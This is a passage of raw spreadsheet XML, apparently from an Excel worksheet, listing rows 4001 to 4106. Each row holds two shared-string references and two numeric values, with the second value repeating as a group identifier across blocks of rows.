    <row r="4001" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4001" t="s">
        <v>16230</v>
      </c>
      <c r="B4001" t="s">
        <v>16220</v>
      </c>
      <c r="C4001">
        <v>0</v>
      </c>
      <c r="D4001">
        <v>2098</v>
      </c>
    </row>
    <row r="4002" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4002" t="s">
        <v>16229</v>
      </c>
      <c r="B4002" t="s">
        <v>16221</v>
      </c>
      <c r="C4002">
        <v>0</v>
      </c>
      <c r="D4002">
        <v>2098</v>
      </c>
    </row>
    <row r="4003" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4003" t="s">
        <v>16230</v>
      </c>
      <c r="B4003" t="s">
        <v>16222</v>
      </c>
      <c r="C4003">
        <v>0</v>
      </c>
      <c r="D4003">
        <v>2098</v>
      </c>
    </row>
    <row r="4004" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4004" t="s">
        <v>16223</v>
      </c>
      <c r="B4004" t="s">
        <v>16223</v>
      </c>
      <c r="C4004">
        <v>28</v>
      </c>
      <c r="D4004">
        <v>2098</v>
      </c>
    </row>
    <row r="4005" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4005" t="s">
        <v>16224</v>
      </c>
      <c r="B4005" t="s">
        <v>16224</v>
      </c>
      <c r="C4005">
        <v>1</v>
      </c>
      <c r="D4005">
        <v>2098</v>
      </c>
    </row>
    <row r="4006" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4006" t="s">
        <v>16228</v>
      </c>
      <c r="B4006" t="s">
        <v>16211</v>
      </c>
      <c r="C4006">
        <v>0</v>
      </c>
      <c r="D4006">
        <v>2054</v>
      </c>
    </row>
    <row r="4007" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4007" t="s">
        <v>16231</v>
      </c>
      <c r="B4007" t="s">
        <v>16212</v>
      </c>
      <c r="C4007">
        <v>0</v>
      </c>
      <c r="D4007">
        <v>2054</v>
      </c>
    </row>
    <row r="4008" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4008" t="s">
        <v>16228</v>
      </c>
      <c r="B4008" t="s">
        <v>16213</v>
      </c>
      <c r="C4008">
        <v>0</v>
      </c>
      <c r="D4008">
        <v>2054</v>
      </c>
    </row>
    <row r="4009" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4009" t="s">
        <v>16231</v>
      </c>
      <c r="B4009" t="s">
        <v>16214</v>
      </c>
      <c r="C4009">
        <v>0</v>
      </c>
      <c r="D4009">
        <v>2054</v>
      </c>
    </row>
    <row r="4010" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4010" t="s">
        <v>16228</v>
      </c>
      <c r="B4010" t="s">
        <v>16215</v>
      </c>
      <c r="C4010">
        <v>0</v>
      </c>
      <c r="D4010">
        <v>2054</v>
      </c>
    </row>
    <row r="4011" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4011" t="s">
        <v>16231</v>
      </c>
      <c r="B4011" t="s">
        <v>16216</v>
      </c>
      <c r="C4011">
        <v>1</v>
      </c>
      <c r="D4011">
        <v>2054</v>
      </c>
    </row>
    <row r="4012" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4012" t="s">
        <v>16228</v>
      </c>
      <c r="B4012" t="s">
        <v>16217</v>
      </c>
      <c r="C4012">
        <v>2</v>
      </c>
      <c r="D4012">
        <v>2054</v>
      </c>
    </row>
    <row r="4013" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4013" t="s">
        <v>16231</v>
      </c>
      <c r="B4013" t="s">
        <v>16218</v>
      </c>
      <c r="C4013">
        <v>1</v>
      </c>
      <c r="D4013">
        <v>2054</v>
      </c>
    </row>
    <row r="4014" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4014" t="s">
        <v>16229</v>
      </c>
      <c r="B4014" t="s">
        <v>16219</v>
      </c>
      <c r="C4014">
        <v>0</v>
      </c>
      <c r="D4014">
        <v>2054</v>
      </c>
    </row>
    <row r="4015" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4015" t="s">
        <v>16230</v>
      </c>
      <c r="B4015" t="s">
        <v>16220</v>
      </c>
      <c r="C4015">
        <v>0</v>
      </c>
      <c r="D4015">
        <v>2054</v>
      </c>
    </row>
    <row r="4016" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4016" t="s">
        <v>16229</v>
      </c>
      <c r="B4016" t="s">
        <v>16221</v>
      </c>
      <c r="C4016">
        <v>0</v>
      </c>
      <c r="D4016">
        <v>2054</v>
      </c>
    </row>
    <row r="4017" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4017" t="s">
        <v>16230</v>
      </c>
      <c r="B4017" t="s">
        <v>16222</v>
      </c>
      <c r="C4017">
        <v>0</v>
      </c>
      <c r="D4017">
        <v>2054</v>
      </c>
    </row>
    <row r="4018" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4018" t="s">
        <v>16223</v>
      </c>
      <c r="B4018" t="s">
        <v>16223</v>
      </c>
      <c r="C4018">
        <v>25</v>
      </c>
      <c r="D4018">
        <v>2054</v>
      </c>
    </row>
    <row r="4019" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4019" t="s">
        <v>16224</v>
      </c>
      <c r="B4019" t="s">
        <v>16224</v>
      </c>
      <c r="C4019">
        <v>0</v>
      </c>
      <c r="D4019">
        <v>2054</v>
      </c>
    </row>
    <row r="4020" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4020" t="s">
        <v>16228</v>
      </c>
      <c r="B4020" t="s">
        <v>16211</v>
      </c>
      <c r="C4020">
        <v>0</v>
      </c>
      <c r="D4020">
        <v>759</v>
      </c>
    </row>
    <row r="4021" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4021" t="s">
        <v>16231</v>
      </c>
      <c r="B4021" t="s">
        <v>16212</v>
      </c>
      <c r="C4021">
        <v>0</v>
      </c>
      <c r="D4021">
        <v>759</v>
      </c>
    </row>
    <row r="4022" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4022" t="s">
        <v>16228</v>
      </c>
      <c r="B4022" t="s">
        <v>16213</v>
      </c>
      <c r="C4022">
        <v>0</v>
      </c>
      <c r="D4022">
        <v>759</v>
      </c>
    </row>
    <row r="4023" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4023" t="s">
        <v>16231</v>
      </c>
      <c r="B4023" t="s">
        <v>16214</v>
      </c>
      <c r="C4023">
        <v>0</v>
      </c>
      <c r="D4023">
        <v>759</v>
      </c>
    </row>
    <row r="4024" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4024" t="s">
        <v>16228</v>
      </c>
      <c r="B4024" t="s">
        <v>16215</v>
      </c>
      <c r="C4024">
        <v>2</v>
      </c>
      <c r="D4024">
        <v>759</v>
      </c>
    </row>
    <row r="4025" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4025" t="s">
        <v>16231</v>
      </c>
      <c r="B4025" t="s">
        <v>16216</v>
      </c>
      <c r="C4025">
        <v>0</v>
      </c>
      <c r="D4025">
        <v>759</v>
      </c>
    </row>
    <row r="4026" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4026" t="s">
        <v>16228</v>
      </c>
      <c r="B4026" t="s">
        <v>16217</v>
      </c>
      <c r="C4026">
        <v>7</v>
      </c>
      <c r="D4026">
        <v>759</v>
      </c>
    </row>
    <row r="4027" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4027" t="s">
        <v>16231</v>
      </c>
      <c r="B4027" t="s">
        <v>16218</v>
      </c>
      <c r="C4027">
        <v>0</v>
      </c>
      <c r="D4027">
        <v>759</v>
      </c>
    </row>
    <row r="4028" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4028" t="s">
        <v>16229</v>
      </c>
      <c r="B4028" t="s">
        <v>16219</v>
      </c>
      <c r="C4028">
        <v>0</v>
      </c>
      <c r="D4028">
        <v>759</v>
      </c>
    </row>
    <row r="4029" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4029" t="s">
        <v>16230</v>
      </c>
      <c r="B4029" t="s">
        <v>16220</v>
      </c>
      <c r="C4029">
        <v>0</v>
      </c>
      <c r="D4029">
        <v>759</v>
      </c>
    </row>
    <row r="4030" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4030" t="s">
        <v>16229</v>
      </c>
      <c r="B4030" t="s">
        <v>16221</v>
      </c>
      <c r="C4030">
        <v>0</v>
      </c>
      <c r="D4030">
        <v>759</v>
      </c>
    </row>
    <row r="4031" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4031" t="s">
        <v>16230</v>
      </c>
      <c r="B4031" t="s">
        <v>16222</v>
      </c>
      <c r="C4031">
        <v>0</v>
      </c>
      <c r="D4031">
        <v>759</v>
      </c>
    </row>
    <row r="4032" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4032" t="s">
        <v>16223</v>
      </c>
      <c r="B4032" t="s">
        <v>16223</v>
      </c>
      <c r="C4032">
        <v>25</v>
      </c>
      <c r="D4032">
        <v>759</v>
      </c>
    </row>
    <row r="4033" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4033" t="s">
        <v>16224</v>
      </c>
      <c r="B4033" t="s">
        <v>16224</v>
      </c>
      <c r="C4033">
        <v>1</v>
      </c>
      <c r="D4033">
        <v>759</v>
      </c>
    </row>
    <row r="4034" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4034" t="s">
        <v>16228</v>
      </c>
      <c r="B4034" t="s">
        <v>16211</v>
      </c>
      <c r="C4034">
        <v>0</v>
      </c>
      <c r="D4034">
        <v>782</v>
      </c>
    </row>
    <row r="4035" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4035" t="s">
        <v>16231</v>
      </c>
      <c r="B4035" t="s">
        <v>16212</v>
      </c>
      <c r="C4035">
        <v>0</v>
      </c>
      <c r="D4035">
        <v>782</v>
      </c>
    </row>
    <row r="4036" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4036" t="s">
        <v>16228</v>
      </c>
      <c r="B4036" t="s">
        <v>16213</v>
      </c>
      <c r="C4036">
        <v>0</v>
      </c>
      <c r="D4036">
        <v>782</v>
      </c>
    </row>
    <row r="4037" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4037" t="s">
        <v>16231</v>
      </c>
      <c r="B4037" t="s">
        <v>16214</v>
      </c>
      <c r="C4037">
        <v>0</v>
      </c>
      <c r="D4037">
        <v>782</v>
      </c>
    </row>
    <row r="4038" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4038" t="s">
        <v>16228</v>
      </c>
      <c r="B4038" t="s">
        <v>16215</v>
      </c>
      <c r="C4038">
        <v>2</v>
      </c>
      <c r="D4038">
        <v>782</v>
      </c>
    </row>
    <row r="4039" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4039" t="s">
        <v>16231</v>
      </c>
      <c r="B4039" t="s">
        <v>16216</v>
      </c>
      <c r="C4039">
        <v>1</v>
      </c>
      <c r="D4039">
        <v>782</v>
      </c>
    </row>
    <row r="4040" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4040" t="s">
        <v>16228</v>
      </c>
      <c r="B4040" t="s">
        <v>16217</v>
      </c>
      <c r="C4040">
        <v>5</v>
      </c>
      <c r="D4040">
        <v>782</v>
      </c>
    </row>
    <row r="4041" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4041" t="s">
        <v>16231</v>
      </c>
      <c r="B4041" t="s">
        <v>16218</v>
      </c>
      <c r="C4041">
        <v>2</v>
      </c>
      <c r="D4041">
        <v>782</v>
      </c>
    </row>
    <row r="4042" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4042" t="s">
        <v>16229</v>
      </c>
      <c r="B4042" t="s">
        <v>16219</v>
      </c>
      <c r="C4042">
        <v>0</v>
      </c>
      <c r="D4042">
        <v>782</v>
      </c>
    </row>
    <row r="4043" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4043" t="s">
        <v>16230</v>
      </c>
      <c r="B4043" t="s">
        <v>16220</v>
      </c>
      <c r="C4043">
        <v>0</v>
      </c>
      <c r="D4043">
        <v>782</v>
      </c>
    </row>
    <row r="4044" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4044" t="s">
        <v>16229</v>
      </c>
      <c r="B4044" t="s">
        <v>16221</v>
      </c>
      <c r="C4044">
        <v>0</v>
      </c>
      <c r="D4044">
        <v>782</v>
      </c>
    </row>
    <row r="4045" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4045" t="s">
        <v>16230</v>
      </c>
      <c r="B4045" t="s">
        <v>16222</v>
      </c>
      <c r="C4045">
        <v>0</v>
      </c>
      <c r="D4045">
        <v>782</v>
      </c>
    </row>
    <row r="4046" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4046" t="s">
        <v>16223</v>
      </c>
      <c r="B4046" t="s">
        <v>16223</v>
      </c>
      <c r="C4046">
        <v>0</v>
      </c>
      <c r="D4046">
        <v>782</v>
      </c>
    </row>
    <row r="4047" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4047" t="s">
        <v>16224</v>
      </c>
      <c r="B4047" t="s">
        <v>16224</v>
      </c>
      <c r="C4047">
        <v>0</v>
      </c>
      <c r="D4047">
        <v>782</v>
      </c>
    </row>
    <row r="4048" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4048" t="s">
        <v>16228</v>
      </c>
      <c r="B4048" t="s">
        <v>16211</v>
      </c>
      <c r="C4048">
        <v>0</v>
      </c>
      <c r="D4048">
        <v>2649</v>
      </c>
    </row>
    <row r="4049" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4049" t="s">
        <v>16231</v>
      </c>
      <c r="B4049" t="s">
        <v>16212</v>
      </c>
      <c r="C4049">
        <v>0</v>
      </c>
      <c r="D4049">
        <v>2649</v>
      </c>
    </row>
    <row r="4050" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4050" t="s">
        <v>16228</v>
      </c>
      <c r="B4050" t="s">
        <v>16213</v>
      </c>
      <c r="C4050">
        <v>0</v>
      </c>
      <c r="D4050">
        <v>2649</v>
      </c>
    </row>
    <row r="4051" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4051" t="s">
        <v>16231</v>
      </c>
      <c r="B4051" t="s">
        <v>16214</v>
      </c>
      <c r="C4051">
        <v>0</v>
      </c>
      <c r="D4051">
        <v>2649</v>
      </c>
    </row>
    <row r="4052" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4052" t="s">
        <v>16228</v>
      </c>
      <c r="B4052" t="s">
        <v>16215</v>
      </c>
      <c r="C4052">
        <v>5</v>
      </c>
      <c r="D4052">
        <v>2649</v>
      </c>
    </row>
    <row r="4053" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4053" t="s">
        <v>16231</v>
      </c>
      <c r="B4053" t="s">
        <v>16216</v>
      </c>
      <c r="C4053">
        <v>1</v>
      </c>
      <c r="D4053">
        <v>2649</v>
      </c>
    </row>
    <row r="4054" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4054" t="s">
        <v>16228</v>
      </c>
      <c r="B4054" t="s">
        <v>16217</v>
      </c>
      <c r="C4054">
        <v>10</v>
      </c>
      <c r="D4054">
        <v>2649</v>
      </c>
    </row>
    <row r="4055" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4055" t="s">
        <v>16231</v>
      </c>
      <c r="B4055" t="s">
        <v>16218</v>
      </c>
      <c r="C4055">
        <v>2</v>
      </c>
      <c r="D4055">
        <v>2649</v>
      </c>
    </row>
    <row r="4056" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4056" t="s">
        <v>16229</v>
      </c>
      <c r="B4056" t="s">
        <v>16219</v>
      </c>
      <c r="C4056">
        <v>0</v>
      </c>
      <c r="D4056">
        <v>2649</v>
      </c>
    </row>
    <row r="4057" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4057" t="s">
        <v>16230</v>
      </c>
      <c r="B4057" t="s">
        <v>16220</v>
      </c>
      <c r="C4057">
        <v>0</v>
      </c>
      <c r="D4057">
        <v>2649</v>
      </c>
    </row>
    <row r="4058" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4058" t="s">
        <v>16229</v>
      </c>
      <c r="B4058" t="s">
        <v>16221</v>
      </c>
      <c r="C4058">
        <v>5</v>
      </c>
      <c r="D4058">
        <v>2649</v>
      </c>
    </row>
    <row r="4059" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4059" t="s">
        <v>16230</v>
      </c>
      <c r="B4059" t="s">
        <v>16222</v>
      </c>
      <c r="C4059">
        <v>98</v>
      </c>
      <c r="D4059">
        <v>2649</v>
      </c>
    </row>
    <row r="4060" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4060" t="s">
        <v>16223</v>
      </c>
      <c r="B4060" t="s">
        <v>16223</v>
      </c>
      <c r="C4060">
        <v>26</v>
      </c>
      <c r="D4060">
        <v>2649</v>
      </c>
    </row>
    <row r="4061" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4061" t="s">
        <v>16224</v>
      </c>
      <c r="B4061" t="s">
        <v>16224</v>
      </c>
      <c r="C4061">
        <v>1</v>
      </c>
      <c r="D4061">
        <v>2649</v>
      </c>
    </row>
    <row r="4062" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4062" t="s">
        <v>16228</v>
      </c>
      <c r="B4062" t="s">
        <v>16211</v>
      </c>
      <c r="C4062">
        <v>4</v>
      </c>
      <c r="D4062">
        <v>935</v>
      </c>
    </row>
    <row r="4063" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4063" t="s">
        <v>16231</v>
      </c>
      <c r="B4063" t="s">
        <v>16212</v>
      </c>
      <c r="C4063">
        <v>0</v>
      </c>
      <c r="D4063">
        <v>935</v>
      </c>
    </row>
    <row r="4064" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4064" t="s">
        <v>16228</v>
      </c>
      <c r="B4064" t="s">
        <v>16213</v>
      </c>
      <c r="C4064">
        <v>0</v>
      </c>
      <c r="D4064">
        <v>935</v>
      </c>
    </row>
    <row r="4065" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4065" t="s">
        <v>16231</v>
      </c>
      <c r="B4065" t="s">
        <v>16214</v>
      </c>
      <c r="C4065">
        <v>0</v>
      </c>
      <c r="D4065">
        <v>935</v>
      </c>
    </row>
    <row r="4066" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4066" t="s">
        <v>16228</v>
      </c>
      <c r="B4066" t="s">
        <v>16215</v>
      </c>
      <c r="C4066">
        <v>97</v>
      </c>
      <c r="D4066">
        <v>935</v>
      </c>
    </row>
    <row r="4067" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4067" t="s">
        <v>16231</v>
      </c>
      <c r="B4067" t="s">
        <v>16216</v>
      </c>
      <c r="C4067">
        <v>68</v>
      </c>
      <c r="D4067">
        <v>935</v>
      </c>
    </row>
    <row r="4068" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4068" t="s">
        <v>16228</v>
      </c>
      <c r="B4068" t="s">
        <v>16217</v>
      </c>
      <c r="C4068">
        <v>0</v>
      </c>
      <c r="D4068">
        <v>935</v>
      </c>
    </row>
    <row r="4069" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4069" t="s">
        <v>16231</v>
      </c>
      <c r="B4069" t="s">
        <v>16218</v>
      </c>
      <c r="C4069">
        <v>0</v>
      </c>
      <c r="D4069">
        <v>935</v>
      </c>
    </row>
    <row r="4070" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4070" t="s">
        <v>16229</v>
      </c>
      <c r="B4070" t="s">
        <v>16219</v>
      </c>
      <c r="C4070">
        <v>12</v>
      </c>
      <c r="D4070">
        <v>935</v>
      </c>
    </row>
    <row r="4071" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4071" t="s">
        <v>16230</v>
      </c>
      <c r="B4071" t="s">
        <v>16220</v>
      </c>
      <c r="C4071">
        <v>0</v>
      </c>
      <c r="D4071">
        <v>935</v>
      </c>
    </row>
    <row r="4072" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4072" t="s">
        <v>16229</v>
      </c>
      <c r="B4072" t="s">
        <v>16221</v>
      </c>
      <c r="C4072">
        <v>0</v>
      </c>
      <c r="D4072">
        <v>935</v>
      </c>
    </row>
    <row r="4073" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4073" t="s">
        <v>16230</v>
      </c>
      <c r="B4073" t="s">
        <v>16222</v>
      </c>
      <c r="C4073">
        <v>0</v>
      </c>
      <c r="D4073">
        <v>935</v>
      </c>
    </row>
    <row r="4074" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4074" t="s">
        <v>16223</v>
      </c>
      <c r="B4074" t="s">
        <v>16223</v>
      </c>
      <c r="C4074">
        <v>0</v>
      </c>
      <c r="D4074">
        <v>935</v>
      </c>
    </row>
    <row r="4075" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4075" t="s">
        <v>16224</v>
      </c>
      <c r="B4075" t="s">
        <v>16224</v>
      </c>
      <c r="C4075">
        <v>0</v>
      </c>
      <c r="D4075">
        <v>935</v>
      </c>
    </row>
    <row r="4076" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4076" t="s">
        <v>16228</v>
      </c>
      <c r="B4076" t="s">
        <v>16211</v>
      </c>
      <c r="C4076">
        <v>0</v>
      </c>
      <c r="D4076">
        <v>2605</v>
      </c>
    </row>
    <row r="4077" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4077" t="s">
        <v>16231</v>
      </c>
      <c r="B4077" t="s">
        <v>16212</v>
      </c>
      <c r="C4077">
        <v>0</v>
      </c>
      <c r="D4077">
        <v>2605</v>
      </c>
    </row>
    <row r="4078" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4078" t="s">
        <v>16228</v>
      </c>
      <c r="B4078" t="s">
        <v>16213</v>
      </c>
      <c r="C4078">
        <v>0</v>
      </c>
      <c r="D4078">
        <v>2605</v>
      </c>
    </row>
    <row r="4079" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4079" t="s">
        <v>16231</v>
      </c>
      <c r="B4079" t="s">
        <v>16214</v>
      </c>
      <c r="C4079">
        <v>0</v>
      </c>
      <c r="D4079">
        <v>2605</v>
      </c>
    </row>
    <row r="4080" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4080" t="s">
        <v>16228</v>
      </c>
      <c r="B4080" t="s">
        <v>16215</v>
      </c>
      <c r="C4080">
        <v>0</v>
      </c>
      <c r="D4080">
        <v>2605</v>
      </c>
    </row>
    <row r="4081" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4081" t="s">
        <v>16231</v>
      </c>
      <c r="B4081" t="s">
        <v>16216</v>
      </c>
      <c r="C4081">
        <v>2</v>
      </c>
      <c r="D4081">
        <v>2605</v>
      </c>
    </row>
    <row r="4082" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4082" t="s">
        <v>16228</v>
      </c>
      <c r="B4082" t="s">
        <v>16217</v>
      </c>
      <c r="C4082">
        <v>5</v>
      </c>
      <c r="D4082">
        <v>2605</v>
      </c>
    </row>
    <row r="4083" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4083" t="s">
        <v>16231</v>
      </c>
      <c r="B4083" t="s">
        <v>16218</v>
      </c>
      <c r="C4083">
        <v>3</v>
      </c>
      <c r="D4083">
        <v>2605</v>
      </c>
    </row>
    <row r="4084" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4084" t="s">
        <v>16229</v>
      </c>
      <c r="B4084" t="s">
        <v>16219</v>
      </c>
      <c r="C4084">
        <v>0</v>
      </c>
      <c r="D4084">
        <v>2605</v>
      </c>
    </row>
    <row r="4085" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4085" t="s">
        <v>16230</v>
      </c>
      <c r="B4085" t="s">
        <v>16220</v>
      </c>
      <c r="C4085">
        <v>0</v>
      </c>
      <c r="D4085">
        <v>2605</v>
      </c>
    </row>
    <row r="4086" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4086" t="s">
        <v>16229</v>
      </c>
      <c r="B4086" t="s">
        <v>16221</v>
      </c>
      <c r="C4086">
        <v>0</v>
      </c>
      <c r="D4086">
        <v>2605</v>
      </c>
    </row>
    <row r="4087" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4087" t="s">
        <v>16230</v>
      </c>
      <c r="B4087" t="s">
        <v>16222</v>
      </c>
      <c r="C4087">
        <v>0</v>
      </c>
      <c r="D4087">
        <v>2605</v>
      </c>
    </row>
    <row r="4088" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4088" t="s">
        <v>16223</v>
      </c>
      <c r="B4088" t="s">
        <v>16223</v>
      </c>
      <c r="C4088">
        <v>25</v>
      </c>
      <c r="D4088">
        <v>2605</v>
      </c>
    </row>
    <row r="4089" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4089" t="s">
        <v>16224</v>
      </c>
      <c r="B4089" t="s">
        <v>16224</v>
      </c>
      <c r="C4089">
        <v>1</v>
      </c>
      <c r="D4089">
        <v>2605</v>
      </c>
    </row>
    <row r="4090" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4090" t="s">
        <v>16228</v>
      </c>
      <c r="B4090" t="s">
        <v>16211</v>
      </c>
      <c r="C4090">
        <v>3</v>
      </c>
      <c r="D4090">
        <v>830</v>
      </c>
    </row>
    <row r="4091" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4091" t="s">
        <v>16231</v>
      </c>
      <c r="B4091" t="s">
        <v>16212</v>
      </c>
      <c r="C4091">
        <v>0</v>
      </c>
      <c r="D4091">
        <v>830</v>
      </c>
    </row>
    <row r="4092" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4092" t="s">
        <v>16228</v>
      </c>
      <c r="B4092" t="s">
        <v>16213</v>
      </c>
      <c r="C4092">
        <v>0</v>
      </c>
      <c r="D4092">
        <v>830</v>
      </c>
    </row>
    <row r="4093" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4093" t="s">
        <v>16231</v>
      </c>
      <c r="B4093" t="s">
        <v>16214</v>
      </c>
      <c r="C4093">
        <v>0</v>
      </c>
      <c r="D4093">
        <v>830</v>
      </c>
    </row>
    <row r="4094" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4094" t="s">
        <v>16228</v>
      </c>
      <c r="B4094" t="s">
        <v>16215</v>
      </c>
      <c r="C4094">
        <v>0</v>
      </c>
      <c r="D4094">
        <v>830</v>
      </c>
    </row>
    <row r="4095" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4095" t="s">
        <v>16231</v>
      </c>
      <c r="B4095" t="s">
        <v>16216</v>
      </c>
      <c r="C4095">
        <v>0</v>
      </c>
      <c r="D4095">
        <v>830</v>
      </c>
    </row>
    <row r="4096" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4096" t="s">
        <v>16228</v>
      </c>
      <c r="B4096" t="s">
        <v>16217</v>
      </c>
      <c r="C4096">
        <v>45</v>
      </c>
      <c r="D4096">
        <v>830</v>
      </c>
    </row>
    <row r="4097" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4097" t="s">
        <v>16231</v>
      </c>
      <c r="B4097" t="s">
        <v>16218</v>
      </c>
      <c r="C4097">
        <v>60</v>
      </c>
      <c r="D4097">
        <v>830</v>
      </c>
    </row>
    <row r="4098" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4098" t="s">
        <v>16229</v>
      </c>
      <c r="B4098" t="s">
        <v>16219</v>
      </c>
      <c r="C4098">
        <v>0</v>
      </c>
      <c r="D4098">
        <v>830</v>
      </c>
    </row>
    <row r="4099" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4099" t="s">
        <v>16230</v>
      </c>
      <c r="B4099" t="s">
        <v>16220</v>
      </c>
      <c r="C4099">
        <v>0</v>
      </c>
      <c r="D4099">
        <v>830</v>
      </c>
    </row>
    <row r="4100" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4100" t="s">
        <v>16229</v>
      </c>
      <c r="B4100" t="s">
        <v>16221</v>
      </c>
      <c r="C4100">
        <v>24</v>
      </c>
      <c r="D4100">
        <v>830</v>
      </c>
    </row>
    <row r="4101" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4101" t="s">
        <v>16230</v>
      </c>
      <c r="B4101" t="s">
        <v>16222</v>
      </c>
      <c r="C4101">
        <v>93</v>
      </c>
      <c r="D4101">
        <v>830</v>
      </c>
    </row>
    <row r="4102" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4102" t="s">
        <v>16223</v>
      </c>
      <c r="B4102" t="s">
        <v>16223</v>
      </c>
      <c r="C4102">
        <v>25</v>
      </c>
      <c r="D4102">
        <v>830</v>
      </c>
    </row>
    <row r="4103" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4103" t="s">
        <v>16224</v>
      </c>
      <c r="B4103" t="s">
        <v>16224</v>
      </c>
      <c r="C4103">
        <v>1</v>
      </c>
      <c r="D4103">
        <v>830</v>
      </c>
    </row>
    <row r="4104" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4104" t="s">
        <v>16228</v>
      </c>
      <c r="B4104" t="s">
        <v>16211</v>
      </c>
      <c r="C4104">
        <v>0</v>
      </c>
      <c r="D4104">
        <v>2110</v>
      </c>
    </row>
    <row r="4105" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4105" t="s">
        <v>16231</v>
      </c>
      <c r="B4105" t="s">
        <v>16212</v>
      </c>
      <c r="C4105">
        <v>0</v>
      </c>
      <c r="D4105">
        <v>2110</v>
      </c>
    </row>
    <row r="4106" spans="1:4" x14ac:dyDescent="0.2">
